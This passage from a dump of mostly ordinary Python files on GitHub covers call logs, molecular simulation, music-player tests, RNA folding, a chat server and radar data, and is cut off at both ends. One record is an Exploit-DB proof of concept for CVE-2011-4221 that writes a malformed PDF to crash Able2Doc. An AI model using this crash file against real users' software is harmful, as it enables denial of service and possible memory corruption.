InvalidCallLogException('source name and exten not found')\n\n result = CallLog(\n tenant_uuid=self._tenant_uuid,\n date=self.date,\n date_answer=self.date_answer,\n date_end=self.date_end,\n source_name=self.source_name,\n source_exten=self.source_exten,\n source_internal_exten=self.source_internal_exten,\n source_internal_context=self.source_internal_context,\n source_internal_name=self.source_internal_name,\n requested_exten=self.requested_exten,\n requested_context=self.requested_context,\n requested_internal_exten=self.requested_internal_exten,\n requested_internal_context=self.requested_internal_context,\n requested_name=self.requested_name,\n destination_name=self.destination_name,\n destination_exten=self.destination_exten,\n destination_internal_exten=self.destination_internal_exten,\n destination_internal_context=self.destination_internal_context,\n destination_line_identity=self.destination_line_identity,\n user_field=self.user_field,\n source_line_identity=self.source_line_identity,\n direction=self.direction,\n destination_details=self.destination_details,\n )\n result.participants = self.participants\n result.cel_ids = self.cel_ids\n result.recordings = self.recordings\n\n return result\n","repo_name":"wazo-platform/wazo-call-logd","sub_path":"wazo_call_logd/raw_call_log.py","file_name":"raw_call_log.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74482902771","text":"import numpy as np\n\n\nclass Box:\n \"\"\"Holds all the information for the Box.\n\n Parameters\n ----------\n box_dims : np.array\n The dimensional lengths of the box, should be a numpy array ([x, y, z]).\n With shape (1, 3).\n\n Returns\n -------\n self : Box\n Returns an instance of itself.\n \n Attributes\n ----------\n box_dims : np.array\n The dimensional lengths of the box, should be a numpy array ([x, y, z]).\n \"\"\"\n def __init__(self, box_dims):\n self.box_dims = box_dims\n\n @property\n def volume(self):\n \"\"\"Calculate the box volume\n\n Returns\n -------\n box volume : float\n Computed box volume\n \"\"\"\n return np.prod(self.box_dims)\n\n def wrap(self, coordinates):\n \"\"\"Wraps the coordinates within the box dimensions\n\n Parameters\n ----------\n coordinates : np.array\n Array of the atomic coordinates.\n\n Returns\n -------\n coordinates : np.array\n Arrays of the wrapped atomic coordinates.\n \"\"\"\n if len(coordinates.shape) == 1:\n coordinates -= self.box_dims * \\\n np.round(coordinates / self.box_dims)\n else:\n coordinates -= self.box_dims[np.newaxis, :] * \\\n np.round(coordinates / self.box_dims[np.newaxis, :])\n return coordinates\n\n def minimum_image_distance(self, index, coordinates):\n \"\"\"Calculate the minimum distance between two atoms.\n\n Parameters\n ----------\n index : int\n index of the particle to take the minimum images for\n\n coordinates : np.array\n Array of the atomic xyz coordinate for all particles.\n\n Returns\n -------\n coord_ij2 : np.array\n Array of the distances between each i-th particle and remaining\n particles\n \"\"\"\n if index != 0 and index != len(coordinates):\n coord_ij = coordinates[index, :] - coordinates[:index, :]\n temp = coordinates[index, :] - coordinates[index + 1:, :]\n coord_ij = np.concatenate((coord_ij, temp))\n elif index == len(coordinates):\n coord_ij = coordinates[index, :] - coordinates[:index, :]\n elif index == 0:\n coord_ij = coordinates[index, :] - coordinates[index + 1:, :]\n \n coord_ij = coord_ij - \\\n self.box_dims[np.newaxis, :] * \\\n np.round(coord_ij / self.box_dims[np.newaxis, :])\n coord_ij2 = np.sum(np.square(coord_ij), axis=1)\n return coord_ij2\n","repo_name":"bdnguye2/2019_molSSI_summer","sub_path":"monte_carlo/mcpy/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74991411571","text":"from quodlibet.browsers.covergrid.main import CoverGrid\nfrom senf import fsnative\n\nfrom . import TestCase, run_gtk_loop\nfrom .helper import realized\n\nfrom quodlibet import config\n\nfrom quodlibet.browsers.albums.prefs import DEFAULT_PATTERN_TEXT\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.library import SongLibrary, SongLibrarian\n\n\nSONGS = [\n AudioFile({\n \"album\": \"one\",\n \"artist\": \"piman\",\n \"~filename\": fsnative(u\"/dev/null\"),\n }),\n AudioFile({\n \"album\": \"two\",\n \"artist\": \"mu\",\n \"~filename\": fsnative(u\"/dev/zero\"),\n }),\n AudioFile({\n \"album\": \"three\",\n \"artist\": \"boris\",\n \"~filename\": fsnative(u\"/bin/ls\"),\n }),\n AudioFile({\n \"album\": \"three\",\n \"artist\": \"boris\",\n \"~filename\": fsnative(u\"/bin/ls2\"),\n }),\n]\nSONGS.sort()\n\n\nclass TCoverGridBrowser(TestCase):\n\n def setUp(self):\n config.init()\n\n library = SongLibrary()\n library.librarian = SongLibrarian()\n CoverGrid.init(library)\n\n for af in SONGS:\n af.sanitize()\n library.add(SONGS)\n\n self.bar = CoverGrid(library)\n\n self._id = self.bar.connect(\"songs-selected\", self._selected)\n self._id2 = self.bar.connect(\"songs-activated\", self._activated)\n with realized(self.bar):\n self.bar.filter_text(\"\")\n self._wait()\n self.songs = []\n self.activated = False\n\n def tearDown(self):\n self.bar.disconnect(self._id)\n self.bar.disconnect(self._id2)\n self.bar.destroy()\n del self.bar\n config.quit()\n\n def _activated(self, albumlist):\n self.activated = True\n\n def _selected(self, albumlist, songs, *args):\n self.songs = songs\n\n def _wait(self):\n run_gtk_loop()\n\n def test_activated(self):\n with realized(self.bar):\n view = self.bar.view\n child = view.get_child_at_index(0)\n child.emit(\"activate\")\n self._wait()\n self.failUnless(self.activated)\n\n def test_can_filter(self):\n with realized(self.bar):\n self.failUnless(self.bar.can_filter(None))\n self.failUnless(self.bar.can_filter(\"album\"))\n self.failUnless(self.bar.can_filter(\"foobar\"))\n self.failIf(self.bar.can_filter(\"~#length\"))\n self.failIf(self.bar.can_filter(\"title\"))\n\n def test_set_text(self):\n with realized(self.bar):\n self.bar.filter_text(\"artist=piman\")\n self._wait()\n self.failUnlessEqual(len(self.songs), 1)\n self.bar.filter_text(\"\")\n self._wait()\n self.failUnlessEqual(set(self.songs), set(SONGS))\n\n def test_filter_album(self):\n with realized(self.bar):\n self.bar.filter_text(\"dsagfsag\")\n self._wait()\n self.failUnlessEqual(len(self.songs), 0)\n self.bar.filter_text(\"\")\n self._wait()\n self.bar.filter(\"album\", [\"one\", \"three\"])\n self._wait()\n self.failUnlessEqual(len(self.songs), 3)\n\n def test_filter_artist(self):\n with realized(self.bar):\n self.bar.filter(\"artist\", [\"piman\"])\n self._wait()\n self.failUnlessEqual(len(self.songs), 1)\n self.failUnlessEqual(self.songs[0](\"artist\"), \"piman\")\n\n def test_header(self):\n self.failIf(self.bar.headers)\n\n def test_list(self):\n albums = self.bar.list_albums()\n self.failUnlessEqual(set(albums), {s.album_key for s in SONGS})\n self.bar.filter_albums([SONGS[0].album_key])\n self._wait()\n self.failUnlessEqual({s.album_key for s in self.songs},\n {SONGS[0].album_key})\n\n def test_active_filter(self):\n with realized(self.bar):\n self.bar.filter(\"artist\", [\"piman\"])\n self._wait()\n self.failUnless(self.bar.active_filter(self.songs[0]))\n for s in SONGS:\n if s is not self.songs[0]:\n self.failIf(self.bar.active_filter(s))\n\n def test_default_display_pattern(self):\n pattern_text = self.bar.display_pattern_text\n self.failUnlessEqual(pattern_text, DEFAULT_PATTERN_TEXT)\n self.failUnless(\"\" in pattern_text)\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_browsers_covergrid.py","file_name":"test_browsers_covergrid.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"73027336693","text":"import io\nimport os\nfrom setuptools import setup\nimport sys\n\n\n# pip workaround\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n\n\n# MacOS .app with py2app\nif sys.platform == 'darwin':\n extra_options = dict(\n setup_requires=['py2app'],\n app=['reprounzip_qt/main.py'],\n options=dict(py2app=dict(argv_emulation=True)))\nelse:\n extra_options = {}\n\n\n# Need to specify encoding for PY3, which has the worst unicode handling ever\nwith io.open('README.rst', encoding='utf-8') as fp:\n description = fp.read()\nsetup(name='reprounzip-qt',\n version='0.2',\n packages=['reprounzip_qt', 'reprounzip_qt.gui'],\n entry_points={\n 'gui_scripts': [\n 'reprounzip-qt = reprounzip_qt.main:main']},\n install_requires=['PyYAML'],\n description=\"Graphical user interface for reprounzip, using Qt\",\n author=\"Remi Rampin, Fernando Chirigati, Dennis Shasha, Juliana Freire\",\n author_email='reprozip-users@vgc.poly.edu',\n maintainer=\"Remi Rampin\",\n maintainer_email='remirampin@gmail.com',\n url='http://vida-nyu.github.io/reprozip/',\n long_description=description,\n license='BSD-3-Clause',\n keywords=['reprozip', 'reprounzip', 'reproducibility', 'provenance',\n 'vida', 'nyu', 'gui'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: X11 Applications :: Qt',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Scientific/Engineering',\n 'Topic :: System :: Archiving'],\n **extra_options)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ViDA-NYU_reprozip/reprozip-master/reprounzip-qt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4003344478","text":"#!/usr/bin/python\n\n# Imports\nimport sys, os, re, time\nimport argparse\nimport pdb\nimport pickle\nfrom itertools import *\n# Science\nimport numpy as np\nimport scipy.stats as stats\nimport pandas as pd\n# Plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\n# Import mixture models\nfrom MixtureModel_multipleDataSources import *\n\n########### LOAD patients of interest\nq_ids_name='q_ids_njdm'\nmain_result_dir='../results'\nselected_participants_dir='../data/{}/selected_participants'.format(q_ids_name)\n\n# Load list of selected participant ids\nwith open('{}/selected_pid'.format(selected_participants_dir),'r') as f:\n selected_pid=np.loadtxt(f,dtype=int)\n \n# Load expert grouping\nexpert_grouping_dir='{}/expert_groupings'.format(selected_participants_dir)\nexpert_file='expert_1'\nwith open('{}/{}'.format(expert_grouping_dir,expert_file),'r') as f:\n # p_idxs to group\n expert_grouping={selected_pid[int(p_idx)]:group for (group,line) in enumerate(f.read().splitlines()) for p_idx in line.split(',')}\n \n# Expert groups\ngroups=np.unique(np.array([val for val in expert_grouping.values()]))\n# Expert \"posterior\"\nexpert_posterior=np.zeros((selected_pid.size, groups.size))\nfor (p_idx,p_id) in enumerate(selected_pid):\n expert_posterior[p_idx,expert_grouping[p_id]]=1.\n\n# Plot heatmap for selected\nfig, ax = plt.subplots(1)\ncmap=plt.pcolormesh(expert_posterior, cmap='inferno', vmin=0., vmax=1.)\nfig.colorbar(cmap)\n# Put the major ticks at the middle of each cell\nk=groups\nax.set_xticks(k+ 0.5, minor=False)\n# X labels are phenotype number\nax.set_xticklabels(k, minor=False)\nplt.xlabel('k')\nplt.ylabel('p_id')\nplt.savefig('../data/{}/selected_participants/expert_groupings/selected_pid_posterior_{}.pdf'.format(q_ids_name, expert_file), format='pdf', bbox_inches='tight')\nplt.close()\n\n########### Selected participant clusterings\n# From what simulation\nq_ids_name='q_ids_njdm'\nK=4\nalpha=0.001\nbeta=0.001\nR=5\nr=1\n\n# Result dir\nresult_dir='../results/{}/infer_MixtureModel_multipleDataSources/online/K_{}/alpha_{}/beta_{}/R_{}/r_{}'.format(q_ids_name, K, alpha, beta, R,r)\n \nif os.path.exists(result_dir+'/mixtureModel.pickle'):\n # Load model\n with open('{}/mixtureModel.pickle'.format(result_dir), 'rb') as f:\n inferredModel=pickle.load(f)\n \n # Topics per patient heatmap\n N_sk=np.zeros((inferredModel.S, inferredModel.K))\n # Iterate over sets for plotting\n for s in np.arange(inferredModel.S):\n k_Z, count_K=np.unique(inferredModel.Z[s,~np.isnan(inferredModel.Z[s,:])], return_counts=True)\n N_sk[s,k_Z.astype(int)]=count_K\n\n # Empirical posterior\n emp_posterior=N_sk/N_sk.sum(axis=1, keepdims=True) \n \n ############## K Vs K ################### \n # Hard assignments\n hard_cluster_assignment=emp_posterior.argmax(axis=1)\n # Confusion matrix\n conf_matrix=np.zeros((K,groups.size))\n for p_id in selected_pid:\n conf_matrix[hard_cluster_assignment[p_id],expert_grouping[p_id]]+=1\n \n # Purity\n purity=np.max(conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=conf_matrix/selected_pid.size*np.log((conf_matrix*selected_pid.size)/(conf_matrix.sum(axis=0,keepdims=True)*conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[conf_matrix==0]=0.\n mi=np.sum(mi_tmp)\n h_c=-np.sum(conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n nmi=mi/(h_c+h_g)/2\n \n ############## Severity yes/no ################### \n # Confusion matrix\n sev_conf_matrix=np.zeros((2,2))\n sev_conf_matrix[0,0]=conf_matrix[0,0].sum()\n sev_conf_matrix[0,1]=conf_matrix[0,1:].sum()\n sev_conf_matrix[1,0]=conf_matrix[1:K,0].sum()\n sev_conf_matrix[1,1]=conf_matrix[1:K,1:].sum()\n \n # Purity\n sev_purity=np.max(sev_conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=sev_conf_matrix/selected_pid.size*np.log((sev_conf_matrix*selected_pid.size)/(sev_conf_matrix.sum(axis=0,keepdims=True)*sev_conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[sev_conf_matrix==0]=0.\n sev_mi=np.sum(mi_tmp)\n h_c=-np.sum(sev_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(sev_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(sev_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(sev_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n sev_nmi=sev_mi/(h_c+h_g)/2\n ############## Mild yes/no ################### \n # Confusion matrix\n not_mild_index_K=np.setdiff1d(np.arange(K),[1])\n not_mild_index_groups=np.setdiff1d(np.arange(groups.size),[1])\n mild_conf_matrix=np.zeros((2,2))\n mild_conf_matrix[0,0]=conf_matrix[1,1].sum()\n mild_conf_matrix[0,1]=conf_matrix[1,not_mild_index_groups].sum()\n mild_conf_matrix[1,0]=conf_matrix[not_mild_index_K,1].sum()\n mild_conf_matrix[1,1]=conf_matrix[np.ix_(not_mild_index_K,not_mild_index_groups)].sum()\n \n # Purity\n mild_purity=np.max(mild_conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=mild_conf_matrix/selected_pid.size*np.log((mild_conf_matrix*selected_pid.size)/(mild_conf_matrix.sum(axis=0,keepdims=True)*mild_conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[mild_conf_matrix==0]=0.\n mild_mi=np.sum(mi_tmp)\n h_c=-np.sum(mild_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(mild_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(mild_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(mild_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n mild_nmi=mild_mi/(h_c+h_g)/2\n print('##############################')\n print('K={}, alpha={}, beta={}, r={}:'.format(K,alpha,beta,r))\n print('##############################')\n print('Confusion matrix')\n print('{}'.format(conf_matrix))\n print('purity={}/nmi={}'.format(purity,nmi))\n print('##############################')\n print('Severity Confusion matrix')\n print('{}'.format(sev_conf_matrix))\n print('sev_purity={}/sev_nmi={}'.format(sev_purity,sev_nmi))\n print('##############################')\n print('##############################')\n print('Mild Confusion matrix')\n print('{}'.format(mild_conf_matrix))\n print('mild_purity={}/mild_nmi={}'.format(mild_purity,mild_nmi))\n print('##############################')\n print('')\n\n","repo_name":"iurteaga/phendo","sub_path":"src/eval_selected_participants.py","file_name":"eval_selected_participants.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32572067058","text":"# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption\n# Date: June 24 2012\n# Exploit Author: Carlos Mario Penagos Hollmann\n# Vendor Homepage: www.investintech.com\n# Version:6.0\n# Tested on: Windows 7\n# CVE : cve-2011-4221\n\n\npayload =\"B\"*13000\ncrash=\"startxref\"\npdf=payload+crash\n\nfilename = \"slimpdPoC.pdf\"\nfile = open(filename,\"w\")\nfile.writelines(pdf)\nfile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/19393.py","file_name":"19393.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"8548169506","text":"# coding: utf-8\n\nimport sys\n\nimport pefile\n\ntry:\n import cppmangle\n cppmangle_available = True\nexcept ImportError:\n cppmangle_available = False\n\n\ndef dump_symbols(dll: str):\n pe = pefile.PE(dll)\n try:\n export_dir_data = pe.DIRECTORY_ENTRY_EXPORT\n except AttributeError:\n print('DIRECTORY_ENTRY_EXPORT not found.')\n return\n\n symbols = export_dir_data.symbols\n mangled_symbols = [\n symbol.name.decode('ascii') for symbol in symbols if symbol.name\n ]\n\n if cppmangle_available:\n demangle = lambda sym: cppmangle.cdecl_sym(cppmangle.demangle(sym))\n\n for symbol in mangled_symbols:\n try:\n print(symbol, '->', demangle(symbol))\n except:\n print(symbol)\n else:\n for symbol in mangled_symbols:\n print(symbol)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('DLL path missing.')\n return\n\n dump_symbols(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n\n# References:\n# ../cppmangle/dump_dll_exports.py\n# ../parse/dump_dll_exports.py\n# https://github.com/erocarrera/pefile/blob/e3514208aa120200ca689c85a23e05f19233a503/pefile.py#L7415-L7433\n","repo_name":"myd7349/Ongoing-Study","sub_path":"python/pefile/dump_dll_exports.py","file_name":"dump_dll_exports.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"29939183910","text":"'''\n1295. Find Numbers with Even Number of Digits\nGiven an array nums of integers, return how many of them contain an even number of digits.\n'''\nimport math\ndef findNumbers(nums):\n count = 0\n for num in nums:\n if int(math.log10(num)%2) == 0:\n count+=1\n return count\n\nprint(findNumbers())\n\n\n\n # def even(num):\n # count = 0\n # while num>0:\n # count+=1\n # num = int(num/10)\n # return count\n# import math\n# num = 123456456456\n# print(int(math.log10(num)+1))","repo_name":"haseeb-kp/DSA","sub_path":"leetcode/even_digit.py","file_name":"even_digit.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33845445981","text":"import numpy as np\nimport argparse, sys\nfrom arnie.mea.mea_utils import *\nfrom copy import copy\n\nclass MEA:\n def __init__(self, bpps, gamma = 1.0, debug=False, run_probknot_heuristic = False, theta=0, stochastic=False):\n self.debug = debug\n self.bpps = bpps\n self.N=self.bpps.shape[0]\n self.gamma = gamma\n self.theta = theta\n self.W = np.zeros([self.N,self.N])\n self.MEA_bp_list = []\n self.structure = ['.']*self.N\n self.MEA_bp_matrix = np.zeros([self.N, self.N])\n self.tb = np.zeros([self.N, self.N])\n self.min_hp_length = 3\n self.evaluated = False\n self.stochastic = stochastic\n\n if run_probknot_heuristic:\n self.run_ProbKnot()\n else:\n self.run_MEA()\n \n def fill_W(self, i, j):\n if self.stochastic:\n options = [self.W[i+1, j], self.W[i, j-1],\\\n (self.gamma+1)*self.bpps[i,j] + self.W[i+1, j-1] - 1,\\\n np.max([self.W[i,k] + self.W[k+1, j] for k in range(i+1,j)])]\n option_wts = options - np.min(options)\n option_wts /= np.sum(option_wts)\n selection = np.random.choice([0,1,2,3],p=option_wts)\n self.W[i,j] = options[selection]\n self.tb[i,j] = selection #0: 5' pass, 1: 3' pass, 2: bp, 3: multiloop\n\n else:\n options = [self.W[i+1, j], self.W[i, j-1],\\\n (self.gamma+1)*self.bpps[i,j] + self.W[i+1, j-1] - 1,\\\n np.max([self.W[i,k] + self.W[k+1, j] for k in range(i+1,j)])]\n self.W[i,j] = np.max(options) \n self.tb[i,j] = np.argmax(options) #0: 5' pass, 1: 3' pass, 2: bp, 3: multiloop\n \n def run_MEA(self):\n # fill weight matrix\n for length in range(self.min_hp_length, self.N):\n for i in range(self.N-length):\n j = i + length\n self.fill_W(i,j)\n \n self.traceback(0,self.N-1)\n \n for x in self.MEA_bp_list:\n self.MEA_bp_matrix[x[0],x[1]]=1\n self.structure[x[0]]='('\n self.structure[x[1]]=')'\n \n self.structure = ''.join(self.structure)\n if not self.evaluated: self.evaluated = True\n\n def run_ProbKnot(self):\n\n #Threshknot step: filter out bps below cutoff theta\n threshknot_filter = np.where(self.bpps <= self.theta)\n filtered_bpps = copy(self.bpps)\n filtered_bpps[threshknot_filter] = 0\n\n output = np.zeros([self.N, self.N])\n \n # ProbKnot heuristic part 1: get all base pairs where p(ij) == p_max(i)\n output[np.where(self.bpps == np.max(self.bpps, axis=0))] = 1\n \n # ProbKnot heuristic part 2: get all base pairs where p(ij) == p_max(j)\n self.MEA_bp_matrix = np.clip(output+np.transpose(output)-1,0,1)\n\n for [i, j] in np.array(np.where(self.MEA_bp_matrix == 1)).T:\n if np.abs(i - j) > 1:\n if [j,i] not in self.MEA_bp_list:\n self.MEA_bp_list.append([i,j])\n #self.structure[i] = '('\n #self.structure[j] = ')'\n #print('Warning: formatting pseudoknotted dot-bracket structures not yet supported. Any pseudoknotted stems will only appear as parentheses (not brackets).')\n #self.structure = ''.join(self.structure)\n self.structure = convert_bp_list_to_dotbracket(self.MEA_bp_list,len(self.bpps))\n\n if not self.evaluated: self.evaluated = True\n\n def traceback(self, i, j):\n if j <= i:\n return\n elif self.tb[i,j] == 0: #5' neighbor\n if self.debug: print(i,j, \"5'\")\n self.traceback(i+1,j)\n elif self.tb[i,j] == 1: #3' neighbor\n if self.debug: print(i,j, \"3'\")\n self.traceback(i,j-1)\n elif self.tb[i,j] == 2: # base pair\n if self.debug: print(i,j,'bp')\n self.MEA_bp_list.append((i,j))\n self.traceback(i+1,j-1)\n else: #multiloop\n for k in range(i+1,j):\n if self.W[i,j] == self.W[i, k] + self.W[k+1,j]:\n if self.debug: print(i,j,\"multiloop, k=\",k)\n self.traceback(i,k)\n self.traceback(k+1,j)\n break\n\n def score_expected(self):\n '''Compute expected values of TP, FP, etc from predicted MEA structure.\n\n Returns: \n pseudoexpected SEN, PPV, MCC, F-score'''\n\n if not self.evaluated: \n if run_probknot_heuristic:\n self.run_ProbKnot()\n else:\n self.run_MEA()\n\n pred_m = self.MEA_bp_matrix[np.triu_indices(self.N)]\n probs = self.bpps[np.triu_indices(self.N)]\n\n TP = np.sum(np.multiply(pred_m, probs)) + 1e-6\n TN = 0.5*self.N*self.N-1 - np.sum(pred_m) - np.sum(probs) + TP + 1e-6\n FP = np.sum(np.multiply(pred_m, 1-probs)) + 1e-6\n FN = np.sum(np.multiply(1-pred_m, probs)) + 1e-6\n\n a,b = np.triu_indices(self.N)\n cFP = 1e-6\n # for i in range(len(pred_m)):\n # if np.sum(self.MEA_bp_matrix,axis=0)[a[i]] + np.sum(self.MEA_bp_matrix,axis=0)[b[i]]==0:\n # cFP += np.multiply(pred_m[i], 1-probs[i])\n\n sen = TP/(TP + FN)\n ppv = TP/(TP + FP - cFP)\n mcc = (TP*TN - (FP - cFP)*FN)/np.sqrt((TP + FP - cFP)*(TP + FN)*(TN + FP - cFP)*(TN + FN))\n fscore = 2*TP/(2*TP + FP - cFP + FN)\n\n return [sen, ppv, mcc, fscore]\n\n def score_ground_truth(self, ground_truth_struct, allow_pseudoknots=False):\n if len(ground_truth_struct[0])==1:\n gt_matrix = convert_dotbracket_to_matrix(ground_truth_struct)\n else:\n gt_matrix = ground_truth_struct\n\n if not self.evaluated: self.run_MEA()\n sen, ppv, mcc, fscore, _ = score_ground_truth(self.MEA_bp_matrix, gt_matrix)\n return [sen, ppv, mcc, fscore]\n","repo_name":"DasLab/arnie","sub_path":"src/arnie/mea/mea.py","file_name":"mea.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"5326006806","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom Connect4Game import Connect4Game\n\n\n\nclass SimpleC4AgentTF():\n input_length = Connect4Game.ROW_COUNT * Connect4Game.COLUMN_COUNT\n\n def __init__(self, name):\n self.name = name\n self.inputs = tf.compat.v1.placeholder(shape=[1, self.input_length], dtype=tf.float32)\n # keep_pct is not used in SimpleAgent, but added to ease transition Simple <-> Deep agent\n self.keep_pct = tf.compat.v1.placeholder(shape=None, dtype=tf.float32)\n self.W = tf.Variable(tf.random_uniform([self.input_length, Connect4Game.COLUMN_COUNT], 0.001, 0.01))\n\n self.Qout = tf.matmul(self.inputs, self.W)\n #self.pred_sort = tf.argsort(self.Qout, 1, direction='DESCENDING')\n\n # Below we obtain the loss by taking the sum of squares difference between the target and prediction Q values.\n self.nextQ = tf.placeholder(shape=[1, Connect4Game.COLUMN_COUNT], dtype=tf.float32)\n self.loss = tf.reduce_sum(tf.square(self.nextQ - self.Qout))\n self.trainer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.01)\n self.updateModel = self.trainer.minimize(self.loss)\n","repo_name":"Ellebaek/c4champion","sub_path":"SimpleC4AgentTF.py","file_name":"SimpleC4AgentTF.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34706837613","text":"#server_side\r\nimport socket\r\nimport select\r\nimport sys\r\nfrom _thread import *\r\n\r\nfrom tools.server_helper import *\r\nfrom tools.client_helper import getIPaddr\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\nIP_address = getIPaddr()\r\nPort = 8091\r\nserver.bind((IP_address, Port))\r\nserver.listen(100)\r\n \r\nlist_of_clients = []\r\n \r\nwhile True:\r\n conn, addr = server.accept()\r\n list_of_clients.append(conn)\r\n print (addr[0] + \" connected\")\r\n start_new_thread(clientthread,(conn,addr)) \r\n \r\nconn.close()\r\nserver.close()","repo_name":"Z4ck404/INSEA_MATCH","sub_path":"server_side_chat_room.py","file_name":"server_side_chat_room.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"41722309276","text":"from io import BytesIO\nfrom typing import Tuple, Union\nfrom math import ceil\nimport aiohttp\nfrom aiohttp_retry import RetryClient,RetryOptionsBase,ExponentialRetry\nimport pandas as pd\nimport requests\nfrom storms._datasource import _DataSource\nfrom storms.precip.datasets._nexradmaps import n0rMAP, n0qMAP, transformRGB\n\nfrom shapely.geometry import Point\nfrom shapely.ops import transform\nfrom pyproj import Transformer\n\nfrom PIL import Image,UnidentifiedImageError\nimport numpy as np\nfrom storms._utils import datetime_like\n\n\ntoProj = Transformer.from_crs(4326, 3857, always_xy=True).transform\ntoGeo = Transformer.from_crs(3857, 4326, always_xy=True).transform\n\n\ndef get_timezone_info(lat, lon):\n url = \"http://api.geonames.org/timezoneJSON?formatted=true&lat={}&lng={}&username=karosc\".format(\n lat, lon\n )\n r = requests.get(url)\n return r.json()\n\n\nclass NEXRAD(_DataSource):\n def __init__(self, lat: float, lon: float, averaging_distance: float = 500):\n \"\"\"Methods for pulling reflectivity from NOAA's nexrad network.\n\n Parameters\n ----------\n ID: str\n name of nexrad source\n\n Returns\n -------\n\n \"\"\"\n self.ID = \"nexrad\"\n self.lat = lat\n self.lon = lon\n self.bbox = NEXRAD._get_bbox(lat, lon, averaging_distance)\n self.resolution = ceil(averaging_distance / 1000) * 2\n self.bbox_str = \",\".join([str(c) for c in self.bbox])\n tz_info = get_timezone_info(lat, lon)\n self.TZ = tz_info[\"timezoneId\"]\n self.gmt_offset = tz_info[\"gmtOffset\"]\n\n @staticmethod\n def _NORtoDBZ(rgb: np.ndarray) -> np.ndarray:\n \"\"\"\n\n Parameters\n ----------\n rgb: np.ndarray:\n\n\n Returns\n -------\n\n \"\"\"\n transformed = transformRGB(rgb)\n transformed[~np.isnan(transformed).any(axis=1)] = n0rMAP[\n transformed[~np.isnan(transformed).any(axis=1)].astype(int)\n ]\n return transformed\n\n @staticmethod\n def _NOQtoDBZ(rgb: np.ndarray) -> np.ndarray:\n \"\"\"\n\n Parameters\n ----------\n rgb: np.ndarray:\n\n\n Returns\n -------\n\n \"\"\"\n transformed = transformRGB(rgb)\n transformed[~np.isnan(transformed).any(axis=1)] = n0qMAP[\n transformed[~np.isnan(transformed).any(axis=1)].astype(int)\n ]\n return transformed\n\n @staticmethod\n def _get_bbox(lat: float, lon: float, buffer: float) -> Tuple[float, ...]:\n \"\"\"\n\n Parameters\n ----------\n lat: float:\n\n lon: float:\n\n buffer: float:\n\n\n Returns\n -------\n\n \"\"\"\n geo = Point(lon, lat)\n proj = transform(toProj, geo)\n bbox = proj.buffer(buffer, cap_style=1)\n bboxGeo = transform(toGeo, bbox)\n return bboxGeo.bounds\n\n # @lru_cache(maxsize=None)\n def request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n aSync: bool = False,\n progress: bool = True,\n **kwargs,\n ) -> pd.DataFrame:\n \"\"\"Request nexrad level III reflectivity data from 